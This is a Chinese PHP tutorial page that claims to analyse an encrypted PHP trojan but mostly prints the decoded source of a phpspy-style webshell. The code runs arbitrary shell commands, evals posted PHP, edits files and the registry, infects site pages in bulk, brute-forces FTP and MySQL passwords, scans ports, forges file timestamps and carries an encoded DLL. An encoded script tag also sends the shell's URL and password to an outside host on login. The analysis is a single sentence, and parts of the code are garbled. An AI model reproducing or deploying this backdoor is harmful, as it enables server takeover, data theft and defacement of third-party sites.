Maison  >  Article  >  php教程  >  php 木马的分析(加密破解)

php 木马的分析(加密破解)

黄舟
黄舟original
2016-12-14 13:03:394338parcourir

分析可以知道,此木马经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,所以写出如下php程序对其进行解码,解压缩,写入文件。
解码解压缩代码如下:

代码如下:


function writetofile($filename, $data)
{ //File Writing
$filenum=@fopen($filename,"w");
if (!$filenum) {
return false;
}
flock($filenum,LOCK_EX);
$file_data=fwrite($filenum,$data);
fclose($filenum);
return true;
}
?> 
 


然后在php的环境下进行运行,会得到php明文文件如下: 

复制代码 代码如下:


error_reporting(7); 
ob_start(); 
$mtime = explode(' ', microtime()); 
$starttime = $mtime[1] + $mtime[0]; 
@set_time_limit(0); 
//非安全模式可以使用上面的函数,超时取消。 
/*===================== 程序配置 =====================*/ 
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效 
$admin['check'] = "1"; 
// 如果需要密码验证,请修改登陆密码 
//默认端口表 
$hidden = "44997"; 
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631"; 
//跳转用的秒 
$admin['jumpsecond'] = "1"; 
//Ftp破解用的连接端口 
$alexa = "yes"; 
//是否显示alexa排名,yes或是no 
$admin['ftpport'] = "21"; 
// 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no) 
$retime = "no"; 
// 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定) 
$cmd = "cmd.exe"; 
// 下面是phpspy显示版权那栏的,因为被很多程序当成作为关键词杀了,鱼寒~~允许自定义吧。还是不懂别改~~ 

/*===================== 配置结束 =====================*/ 
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; 
$serverp = $admin['pass']; 
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9'); 
$copyurll = base64_decode('Jz48L3NjcmlwdD4='); 
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals'); 
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);} 
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions"); 
/*===================== 身份验证 =====================*/ 
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "";echo "注销成功......

三秒后自动退出或单击这里退出程序界面 >>>";exit;} 
if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}} 
/*===================== 验证结束 =====================*/ 
// 判断 magic_quotes_gpc 状态 
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);} 
//mix.dll的代码 
$mixdll = "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"; 

function shelL($command){ 
global $windows,$disablefunctions; 
$exec = '';$output= ''; 
$dep[]=array('pipe','r');$dep[]=array('pipe','w'); 
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} 
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } 
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} 
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} 
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} 
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} 
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} 
return $exec; 

// 查看PHPINFO 
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看";exit; 
}if($_GET['action'] == "nowuser") {$user = get_current_user(); 
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!"; 
echo"当前进程用户名:$user"; 
exit; 

if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]}
if($action=="mysqldown"){
$link=@mysql_connect($host,$user,$password);
if (!$link) {
$downtmp = '数据库连接失败: ' . mysql_error();
}else{
$query="select load_file('".$filename."');";
$result = @mysql_query($query, $link);
if(!$result){
$downtmp = "读取失败,可能是文件不存在或是没file权限。
".mysql_error(); 
}else{ 
while ($row = mysql_fetch_array($result)) { 
$filename = basename($filename); 
if($rardown=="yes"){ 
$zip = NEW Zip; 
$zipfiles[]=Array("$filename",$row[0]); 
$zip->Add($zipfiles,1); 
$code = $zip->get_file(); 
$filename = "".$filename.".rar"; 
}else{ 
$code = $row[0]; 

header("Content-type: application/octet-stream"); 
header("Accept-Ranges: bytes"); 
header("Accept-Length: ".strlen($code)); 
header("Content-Disposition: attachment;filename=$filename"); 
echo($code); 
exit; 




// 在线代理 
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "


获取 URL 内容失败

";exit; 

// 下载文件 
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;} 

// 直接下载备份数据库 
if ($_POST['backuptype'] == 'download') { 
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); 
@mysql_select_db($dbname) or die("选择数据库失败"); 
$table = array_flip($_POST['table']); 
$result = mysql_query("SHOW tables"); 
echo ($result) ? NULL : "出错: ".mysql_error(); 

$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); 
header('Content-type: application/unknown'); 
header('Content-Disposition: attachment; filename='.$filename); 
$mysqldata = ''; 
while ($currow = mysql_fetch_array($result)) { 
if (isset($table[$currow[0]])) { 
$mysqldata.= sqldumptable($currow[0]); 
$mysqldata.= $mysqldata."\r\n"; 


mysql_close(); 
exit; 


// 程序目录 
$pathname=str_replace('\\','/',dirname(__FILE__)); 
$dirpath=str_replace('\\','/',$_SERVER["DOCUMENT_ROOT"]); 

// 获取当前路径 
if (!isset($dir) or empty($dir)) { 
$dir = "."; 
$nowpath = getPath($pathname, $dir); 
} else { 
$dir=$_GET['dir']; 
$nowpath = getPath($pathname, $dir); 


// 判断读写情况 
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写"; 
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; 
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | 注册表操作" : ""; 

$tb = new FORMS; 

?> 
 
 
 
 
 
 
<?php echo"$myneme"?> 
 
 
//$_SERVER["DOCUMENT_ROOT"]
$tb->tableheader(); 
$tb->tdbody('
'.$_SERVER['HTTP_HOST'].''.date("Y年m月d日 h:i:s",time()).''.gethostbyname($_SERVER['SERVER_NAME']).'
','center','top'); 
$tb->tdbody('根目录 | Shell目录 | 环境变量 | 在线代理'.$reg.$phpinfo.' | WebShell | 杂项破解 | 解压mix.dll | 注销登录'); 
$tb->tdbody('批量挂马 | Http文件下载 | 文件查找 | 执行php脚本 | 执行SQL语句 | Func反弹Shell | MySQL备份 | Serv-U提权'); 
$tb->tablefooter(); 
?> 

 
 
$tb->headerform(array('method'=>'GET','content'=>'

程序路径: '.$pathname.'
当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
跳转目录: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗')); 

$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); 

$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit'))); 

$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit'))); 
?> 

 

 
/*===================== 执行操作 开始 =====================*/ 
echo "

\n"; 
// 删除文件 
if (!empty($delfile)) { 
if (file_exists($delfile)) { 
echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!"; 
} else { 
echo basename($delfile)." 文件已不存在!"; 



// 删除目录 
elseif (!empty($deldir)) { 
$deldirs="$dir/$deldir"; 
if (!file_exists("$deldirs")) { 
echo "$deldir 目录已不存在!"; 
} else { 
echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!"; 



// 创建目录 
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { 
if (!empty($newdirectory)) { 
$mkdirs="$dir/$newdirectory"; 
if (file_exists("$mkdirs")) { 
echo "该目录已存在!"; 
} else { 
echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!"; 
@chmod("$mkdirs",0777); 




// 上传文件 
elseif ($doupfile) { 
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!"; 

elseif($action=="mysqlup"){ 
$filename = $_FILES['upfile']['tmp_name']; 
if(!$filename) { 
echo"没有选择要上传的文件。。"; 
}else{ 
$shell = file_get_contents($filename); 
$mysql = bin2hex($shell); 
if(!$upname) $upname = $_FILES['upfile']['name']; 
$shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';"; 
$link=@mysql_connect($host,$user,$password); 
if(!$link){ 
echo "登陆失败".mysql_error(); 
}else{ 
$result = mysql_query($shell, $link); 
if($result){ 
echo"操作成功.文件成功上传到".$host.",文件名为".$uppath."/".$upname.".."; 
}else{ 
echo"上传失败 原因:".mysql_error(); 





elseif($action=="mysqldown"){ 
if(!empty($downtmp)) echo $downtmp; 

// 编辑文件 
elseif ($_POST['do'] == 'doeditfile') { 
if (!empty($_POST['editfilename'])) { 
if(!file_exists($editfilename)) unset($retime); 
if($time==$now) $time = @filemtime($editfilename); 
$time2 = @date("Y-m-d H:i:s",$time); 
$filename="$editfilename"; 
@$fp=fopen("$filename","w"); 
if($_POST['change']=="yes"){ 
$filecontent = "?".">".$_POST['filecontent']."$filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = ""; 
}else{ 
$filecontent = $_POST['filecontent']; 

echo $msg=@fwrite($fp,$filecontent) ? "写入文件成功!" : "写入失败!"; 
@fclose($fp); 
if($retime=="yes"){ 
echo" 鱼鱼自动操作:"; 
echo $msg=@touch($filename,$time) ? "修改文件为".$time2."成功!" : "修改文件时间失败!"; 

} else { 
echo "请输入想要编辑的文件名!"; 


//文件下载 
elseif ($_POST['do'] == 'downloads') { 
$contents = @file_get_contents($_POST['durl']); 
if(!$contents){ 
echo"无法读取要下载的数据"; 

elseif(file_exists($path)){ 
echo"很抱歉,文件".$path."已经存在了,请更换保存文件名。"; 
}else{ 
$fp = @fopen($path,"w"); 
echo $msg=@fwrite($fp,$contents) ? "下载文件成功!" : "下载文件写入时失败!"; 
@fclose($fp); 


elseif($_POST['action']=="mix"){ 
if(!file_exists($_POST['mixto'])){ 
$tmp = base64_decode($mixdll); 
$tmp = gzinflate($tmp); 
$fp = fopen($_POST['mixto'],"w"); 
echo $msg=@fwrite($fp,$tmp) ? "解压缩成功!" : "此目录不可写吧?!"; 
fclose($fp); 
}else{ 
echo"不是吧?".$_POST['mixto']."已经存在了耶~"; 


// 编辑文件属性 
elseif ($_POST['do'] == 'editfileperm') { 
if (!empty($_POST['fileperm'])) { 
$fileperm=base_convert($_POST['fileperm'],8,10); 
echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!"; 
echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4); 
} else { 
echo "请输入想要设置的属性!"; 



// 文件改名 
elseif ($_POST['do'] == 'rename') { 
if (!empty($_POST['newname'])) { 
$newname=$_POST['dir']."/".$_POST['newname']; 
if (@file_exists($newname)) { 
echo "".$_POST['newname']." 已经存在,请重新输入一个!"; 
} else { 
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名为 ".$_POST['newname']." !" : "文件名修改失败!"; 

} else { 
echo "请输入想要改的文件名!"; 


elseif ($_POST['do'] == 'search') { 
if(!empty($oldkey)){ 
echo"查找关键词:[".$oldkey."],下面显示查找的结果:"; 
if($type2 == "getpath"){ 
echo"鼠标移到结果文件上会有部分截取显示."; 

echo"


"; 
find($path); 
}else{ 
echo"你要查虾米?到底要查虾米呢?有没有虾米要你查呢?"; 


elseif ($_GET['action']=='plgmok') { 
dirtree($_POST['dir'],$_POST['mm']); 

elseif ($_GET['action'] == "plgm") { 
$action = '?action=plgmok'; 
$gm = ""; 
$tb->tableheader(); 
$tb->formheader($action,'批量挂马'); 
$tb->tdbody('网站批量挂马程序php版','center'); 
$tb->tdbody('文件位置: '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'
要挂代码:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','批量挂马').'
'.$tb->makeinput('submit','开始挂马','','submit'),'center','1','35'); 
echo ""; 
$tb->tablefooter(); 
}//end plgm 
// 克隆时间 
elseif ($_POST['do'] == 'domodtime') { 
if (!@file_exists($_POST['curfile'])) { 
echo "要修改的文件不存在!"; 
} else { 
if (!@file_exists($_POST['tarfile'])) { 
echo "要参照的文件不存在!"; 
} else { 
$time=@filemtime($_POST['tarfile']); 
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!"; 




// 自定义时间 
elseif ($_POST['do'] == 'modmytime') { 
if (!@file_exists($_POST['curfile'])) { 
echo "要修改的文件不存在!"; 
} else { 
$year=$_POST['year']; 
$month=$_POST['month']; 
$data=$_POST['data']; 
$hour=$_POST['hour']; 
$minute=$_POST['minute']; 
$second=$_POST['second']; 
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) { 
$time=strtotime("$data $month $year $hour:$minute:$second"); 
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!"; 



elseif($do =='port'){ 
$tmp = explode(",",$port); 
$count = count($tmp); 
for($i=$first;$i<$count;$i++){ 
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); 
if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."
"; 


/* 
这里代码写得很杂,说实话我自己都不知道写了什么。 
好在能用,我就没管了,假设有人看到干脆重写吧。*/ 
elseif ($do == 'crack') {//反正注册为全局变量了。 
if(@file_exists($passfile)){ 
$tmp = file($passfile); 
$count = count($tmp); 
if(empty($onetime)){ 
$onetime = $count; 
$turn="1"; 
}else{ 
$nowturn = $turn+1; 
$now = $turn*$onetime; 
$tt = intval(($count/$onetime)+1); 

if($turn>$tt or $onetime>$count){ 
echo"超过字典容量了耶~要是破解最后进程的,很抱歉失败。"; 
}else{ 
$first = $onetime*($turn-1); 
for($i=$first;$i<$now;$i++){
if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
if($sa)
{
$t = "获取".$user."的密码为".$tmp[$i]."";
}
}
if(!$t){
echo "字典总共".$count."个,现在从".$first."到".$now.",".$admin[jumpsecond]."秒后进行这".$onetime."个密码的试探. >>>
全历此次".$type."的破解需要".$tt."次,现在是第".$turn."次解密。
"; 

else { 
echo"$t"; 


}else{ 
echo"字典文件不存在,请确定。"; 


elseif($do =='port'){ 
if(!eregi("-",$port)){ 
$tmp = explode(",",$port); 
$count = count($tmp); 
$first = "1"; 
}else{ 
$tmp = explode("-",$port); 
$first = $tmp[0]; 
$count = $tmp[1]; 


for($i=$first;$i<$count;$i++){ 
if(!eregi("-",$port)){ 
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); 
if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."
"; 
}else{ 
$fp = @fsockopen($host, $i, $errno, $errstr, 1); 
if($fp) echo"发现".$host."主机打开了端口".$i."
"; 




// 连接MYSQL 
elseif ($connect) { 
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "数据库连接成功!"; 
mysql_close(); 
} else { 
echo mysql_error(); 



// 执行SQL语句 
elseif ($_POST['do'] == 'query') { 
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); 
@mysql_select_db($dbname) or die("选择数据库失败"); 
$result = @mysql_query($_POST['sql_query']); 
echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error(); 
mysql_close(); 


// 备份操作 
elseif ($_POST['do'] == 'backupmysql') { 
if (empty($_POST['table']) OR empty($_POST['backuptype'])) { 
echo "请选择欲备份的数据表和备份方式!"; 
} else { 
if ($_POST['backuptype'] == 'server') { 
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); 
@mysql_select_db($dbname) or die("选择数据库失败"); 
$table = array_flip($_POST['table']); 
$filehandle = @fopen($path,"w"); 
if ($filehandle) { 
$result = mysql_query("SHOW tables"); 
echo ($result) ? NULL : "出错: ".mysql_error(); 
while ($currow = mysql_fetch_array($result)) { 
if (isset($table[$currow[0]])) { 
sqldumptable($currow[0], $filehandle); 
fwrite($filehandle,"\n\n\n"); 


fclose($filehandle); 
echo "数据库已成功备份到 ".$path.""; 
mysql_close(); 
} else { 
echo "备份失败,请确认目标文件夹是否具有可写权限!"; 




elseif($downrar) { 
if (!empty($dl)) { 
if(eregi("unzipto:",$localfile)){ 
$path = "".$dir."/".str_replace("unzipto:","",$localfile).""; 
$zip = new Zip; 
$zipfile=$dir."/".$dl[0]; 
$array=$zip->get_list($zipfile); 
$count=count($array); 
$f=0; 
$d=0; 
for($i=0;$i<$count;$i++) {
if($array[$i][folder]==0) {
if($zip->Extract($zipfile,$path,$i)>0) $f++; 

else $d++; 

if($i==$f+$d) echo "$dl[0] 解压到".$path."成功
($f 个文件 $d 个目录)"; 
elseif($f==0) echo "$dl[0] 解压到".$path."失败"; 
else echo "$dl[0] 未解压完整
(已解压 $f 个文件 $d 个目录)"; 
}else{ 
$zipfile=""; 
$zip = new Zip; 
for($k=0;isset($dl[$k]);$k++) 

$zipfile=$dir."/".$dl[$k]; 
if(is_dir($zipfile)) 

unset($zipfilearray); 
addziparray($dl[$k]); 
for($i=0;$zipfilearray[$i];$i++) 

$filename=$zipfilearray[$i]; 
$filesize=@filesize($dir."/".$zipfilearray[$i]); 
$fp=@fopen($dir."/".$filename,rb); 
$zipfiles[]=Array($filename,@fread($fp,$filesize)); 
@fclose($fp); 


else 

$filename=$dl[$k]; 
$filesize=@filesize($zipfile); 
$fp=@fopen($zipfile,rb); 
$zipfiles[]=Array($filename,@fread($fp,$filesize)); 
@fclose($fp); 


$zip->Add($zipfiles,1); 
$code = $zip->get_file(); 
$ck = "_QQ44997_".date("Y-m-d",time()).""; 
if(empty($localfile)){ 
header("Content-type: application/octet-stream"); 
header("Accept-Ranges: bytes"); 
header("Accept-Length: ".strlen($code)); 
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip"); 
echo $code; 
exit; 
}else{ 
$fp = @fopen("".$dir."/".$localfile."","w"); 
echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "目录".$dir."无可写权限!"; 
@fclose($fp); 


} else { 
echo "请选择要打包下载的文件!"; 


// Shell.Application 运行程序 
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) { 
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); 
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']); 
echo ($a=='0') ? "程序已经成功执行!" : "程序运行失败!"; 

// 查看PHP配置参数状况 
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) { 
echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname']).""; 

// 读取注册表 
elseif(($regread) AND !empty($_POST['readregname'])) { 
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell'); 
var_dump(@$shell->RegRead($_POST['readregname'])); 


// 写入注册表 
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) { 
$shell= &new COM('W'.'Scr'.'ipt.S'.'hell'); 
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']); 
echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!"; 

// 删除注册表 
elseif(($regdelete) AND !empty($_POST['delregname'])) { 
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll'); 
$a = @$shell->RegDelete($_POST['delregname']); 
echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!"; 

else { 
echo "$notice"; 
echo "Program | pcAnywhere | 开始程序 | AllUsers | Serv-U | "; 
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\\";} 



echo "

\n"; 
/*===================== 执行操作 结束 =====================*/ 
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { 
$tb->tableheader(); 
?> 
 
文件 
创建日期 
最后修改 
大小 
属性 
操作 
 
 
// 目录列表
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
echo "\n"; 
echo " [$file]\n"; 
echo " $ctime\n"; 
echo " $mtime\n"; 
echo " Search\n"; 
echo " $dirperm\n"; 
echo " | 删除 | 改名 |\n"; 
echo "\n"; 
$dir_i++; 
} else { 
if($file=="..") { 
echo "\n"; 
echo " 返回上级目录\n"; 
echo "\n"; 



}// while 
@closedir($dirs); 
?> 
 
 
 
// 文件列表 
$dirs=@opendir($dir); 
$file_i = '0'; 
while ($file=@readdir($dirs)) { 
$filepath="$dir/$file"; 
$a=@is_dir($filepath); 
if($a=="0"){ 
$size=@filesize($filepath); 
$size=$size/1024 ; 
$size= @number_format($size, 3); 
if (@filectime($filepath) == @filemtime($filepath)) { 
$ctime=@date("Y-m-d H:i:s",@filectime($filepath)); 
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); 
} else { 
$ctime="".@date("Y-m-d H:i:s",@filectime($filepath)).""; 
$mtime="".@date("Y-m-d H:i:s",@filemtime($filepath)).""; 

@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); 
echo "\n"; 
echo " "; 
echo ""; 
echo "$file\n"; 
echo " $ctime\n"; 
echo " $mtime\n"; 
echo " $size KB\n"; 
echo " $fileperm\n"; 
echo " 下载 | 编辑 | 删除 | 改名 | 时间\n"; 
echo "\n"; 
$file_i++; 

}// while 
@closedir($dirs); 
if(get_cfg_var('safemode'))$z = "(?)"; 
else $z = "(?)"; 
$tb->tdbody('
'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' 本地文件:'.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','选中打包下载或本地保存','','submit').' '.$z.''.$dir_i.' 个目录 / '.$file_i.' 个文件
','center',getrowbg(),'','','6'); 

echo "
\n"; 
echo "\n"; 
}// end dir 

elseif ($_GET['action'] == "editfile") { 
if(empty($newfile)) { 
$filename="$dir/$editfile"; 
$fp=@fopen($filename,"r"); 
$contents=@fread($fp, filesize($filename)); 
@fclose($fp); 
$contents=htmlspecialchars($contents); 
}else{ 
$editfile=$newfile; 
$filename = "$dir/$editfile"; 

$action = "?dir=".urlencode($dir)."&editfile=".$editfile; 
$tb->tableheader(); 
$tb->formheader($action,'新建/编辑文件'); 
$tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件 Php代码加密: '); 
$tb->tdbody($tb->maketextarea('filecontent',$contents)); 
$tb->makehidden('do','doeditfile'); 
$tb->formfooter('1','30'); 
}//end editfile 

elseif ($_GET['action'] == "rename") { 
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']); 
$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname); 
$tb->tableheader(); 
$tb->formheader($action,'修改文件名'); 
